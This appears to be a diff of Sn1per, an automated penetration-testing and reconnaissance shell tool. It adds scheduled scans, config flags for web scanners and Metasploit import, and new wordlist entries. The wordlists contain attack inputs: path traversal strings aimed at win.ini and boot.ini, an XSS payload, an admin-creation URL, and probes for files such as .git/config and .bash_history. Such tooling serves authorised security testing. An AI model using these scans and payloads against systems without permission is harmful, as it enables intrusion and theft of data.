echo ' [*] HTTP WEBSCAN MODE'
echo ' sniper -t|--target <TARGET> -m|--mode webscan '
echo ""
echo ' [*] ENABLE BRUTEFORCE'
echo ' sniper -t|--target <TARGET> -b|--bruteforce'
echo ""
@ -85,9 +88,15 @@ function help {
echo ' [*] LOOT REIMPORT FUNCTION'
echo ' sniper -w <WORKSPACE_ALIAS> --reimport'
echo ""
echo ' [*] LOOT REIMPORTALL FUNCTION'
echo ' sniper -w <WORKSPACE_ALIAS> --reimportall'
echo ""
echo ' [*] LOOT REIMPORT FUNCTION'
echo ' sniper -w <WORKSPACE_ALIAS> --reload'
echo ""
echo ' [*] SCHEDULED SCANS'
echo ' sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'
echo ""
echo ' [*] UPDATE SNIPER'
echo ' sniper -u|--update'
echo ""
@ -237,16 +246,35 @@ case $key in
shift # past argument
shift # past argument
;;
-s|--schedule)
if [ -z "$WORKSPACE" ]; then
echo "You need to set a workspace via the -w switch to schedule a scan task."
exit
fi
SCHEDULE_ARG="$2"
if [ "$SCHEDULE_ARG" = "daily" ] || [ "$SCHEDULE_ARG" = "weekly" ] || [ "$SCHEDULE_ARG" = "monthly" ]; then
SCHEDULE_TASK="$WORKSPACE_DIR/scans/scheduled/$SCHEDULE_ARG.sh"
vim $SCHEDULE_TASK
cat $WORKSPACE_DIR/scans/scheduled/*.sh 2> /dev/null
exit
else
echo "You need to specify either daily, weekly or monthly for the scheduled scan argument."
exit
fi
shift # past argument
shift # past argument
;;
-d|--delete)
echo "Do you want to remove the workspace? $WORKSPACE_DIR"
read ANS
logo
echo "Are you sure you want to remove the following workspace? (Hit Ctrl+C to exit): /usr/share/sniper/loot/workspace/$WORKSPACE/"
read ANS
rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/
echo "Workspace /usr/share/sniper/loot/workspace/$WORKSPACE/ was removed."
exit
shift # past argument
;;
-dh|--delete-host)
echo "Do you want to remove $TARGET from $WORKSPACE?"
read ANS
echo "Removing $TARGET from $WORKSPACE"
sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt $WORKSPACE_DIR/domains/targets.txt 2> /dev/null
rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null
sniper --reimport -w $WORKSPACE
@ -314,29 +342,35 @@ function init {
mkdir $LOOT_DIR/credentials 2> /dev/null
mkdir $LOOT_DIR/web 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir -p $LOOT_DIR/scans/scheduled/ 2> /dev/null
touch $LOOT_DIR/scans/scheduled/daily.sh 2> /dev/null
touch $LOOT_DIR/scans/scheduled/weekly.sh 2> /dev/null
touch $LOOT_DIR/scans/scheduled/monthly.sh 2> /dev/null
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
/etc/init.d/metasploit start 2> /dev/null > /dev/null 2>&1 &
msfdb start 2> /dev/null > /dev/null
if [ "$AUTOBRUTE" == "1" ]; then
echo "$TARGET autobrute `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-autobrute.txt 2> /dev/null
fi
if [ "$FULLNMAPSCAN" == "1" ]; then
echo "$TARGET fullnmapscan `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-fullnmapscan.txt 2> /dev/null
fi
if [ "$OSINT" == "1" ]; then
echo "$TARGET osint `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-osint.txt 2> /dev/null
fi
if [ "$RECON" == "1" ]; then
echo "$TARGET recon `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
fi
}
# REMOVE HOST FROM WORKSPACE sed -i "/www.test.com/d" domains/targets-all-sorted.txt domains/domains-all-sorted.txt domains/targets.txt
function loot {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
@ -380,16 +414,19 @@ function loot {
echo ""
cd ..
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
#touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null
sed -E "s/^\.//g" $LOOT_DIR/domains/domains-all-presorted.txt | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null
sed -E "s/^\.//g" $LOOT_DIR/domains/targets-all-presorted.txt | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sed -i -E 's/address//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/domains-all-presorted2.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
cd $LOOT_DIR/screenshots/
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
cd $LOOT_DIR
if [ -f $SNIPER_PRO ]; then
if [ "$SN1PER_AUTOLOAD" = "1" ]; then
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
@ -466,6 +503,7 @@ source modes/fullportonly.sh
source modes/web.sh
source modes/webporthttp.sh
source modes/webporthttps.sh
source modes/webscan.sh
source modes/stealth.sh
source modes/airstrike.sh
source modes/nuke.sh

View File

@ -16,10 +16,10 @@ AUTOBRUTE="0"
FULLNMAPSCAN="0"
OSINT="0"
ENABLE_AUTO_UPDATES="1"
ONLINE="1"
# ONLINE="1"
REPORT="1"
LOOT="1"
METASPLOIT_IMPORT="0"
METASPLOIT_IMPORT="1"
SNIPER_PRO_CONSOLE_OUTPUT="0"
SN1PER_AUTOLOAD="1"
@ -38,10 +38,14 @@ MSF_LPORT="4444"
CENSYS_APP_ID=""
CENSYS_API_SECRET=""
# SLACK API
SLACK_NOTIFICATIONS="0"
# WEB BRUTE FORCE WORDLISTS
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
WEB_BRUTE_EXTENSIONS="htm,html,asp,aspx,php,jsp,action,do,war,cfm,page,bak,cfg,sql,txt,md,zip,jar,tar.gz,conf,swp,xml,ini,yml,cgi,pl,js,json"
# DOMAIN WORDLISTS
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
@ -89,6 +93,9 @@ METAGOOFIL="1"
# ACTIVE WEB PLUGINS
BURP_SCAN="1"
ARACHNI_SCAN="1"
DIRSEARCH="1"
GOBUSTER="0"
NIKTO="1"
BLACKWIDOW="1"
CLUSTERD="1"
@ -110,7 +117,8 @@ WEB_BRUTE_EXPLOITSCAN="1"
WAYBACKMACHINE="1"
SSL="1"
PASSIVE_SPIDER="1"
CUTYCAPT="1"
CUTYCAPT="0"
WEBSCREENSHOT="1"
# EMAIL PLUGINS
SPOOF_CHECK="1"
@ -125,4 +133,6 @@ DNSCAN="1"
CRTSH="1"
SUBOVER="1"
PROJECT_SONAR="1"
CENSYS_SUBDOMAINS="1"
CENSYS_SUBDOMAINS="1"
SUBNET_RETRIEVAL="1"
SUBJACK="1"

View File

@ -1,4 +1,11 @@
.git/config
.travis.yml
Makefile
Dockerfile
package.json
gulpfile.js
composer.json
web.config
.bash_history
.bashrc
.cache
@ -11,6 +18,10 @@
.hta
.htaccess
.htpasswd
.DS_Store
readme.md
readme.txt
.gitignore
.listing
.listings
.mysql_history

View File

@ -7,6 +7,7 @@
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../windows/win.ini
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/\@AdminViewError

File diff suppressed because it is too large Load Diff

View File

@ -32,4 +32,16 @@ admin
Admin
data
portal
js
js
.git/config
.travis.yml
Makefile
Dockerfile
package.json
gulpfile.js
composer.json
web.config
.DS_Store
readme.md
readme.txt
.gitignore

View File

@ -47,6 +47,7 @@ servlet/AdminServlet
servlet/AxisServlet
TiVoConnect?Command=QueryServer
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
cgi-bin/config.exp
cgi-bin/cart32.exe
cgi-bin/classified.cgi
cgi-bin/download.cgi